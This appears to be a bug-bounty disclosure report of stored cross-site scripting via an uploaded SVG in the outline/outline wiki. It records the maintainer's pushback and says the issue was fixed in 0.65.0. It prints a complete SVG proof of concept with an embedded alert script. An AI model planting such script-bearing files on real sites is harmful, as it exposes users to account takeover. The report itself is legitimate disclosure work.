We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

xss via svg file in outline/outline

Valid

Reported on

Jul 1st 2022

Description

xss via svg file

Proof of Concept

1. goto your account and create a document under a collection .
2. Now edit this document and upload bellow svg file in this document content as image

filename-->evil.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" >
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('Thais app is probably vulnerable to XSS attackss!');
   </script>
</svg>

3. after upload open the svg file url and see xss is executed

Impact

xss to control victim account

We are processing your report and will contact the outline team within 24 hours. a year ago
ranjit-git modified the report
a year ago
We have contacted a member of the outline team and are waiting to hear back a year ago
Tom Moor
a year ago

Maintainer

Scripts within SVG's is a feature of the format, it is not inherently a bug or security issue. Images are hosted on a completely separate domain without any cookies or other user data, are you able to prove xss to control victim account?

ranjit-git modified the report
a year ago
outline/outline maintainer has acknowledged this report a year ago
Tom Moor validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor marked this as fixed in 0.65.0 with commit 206545 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation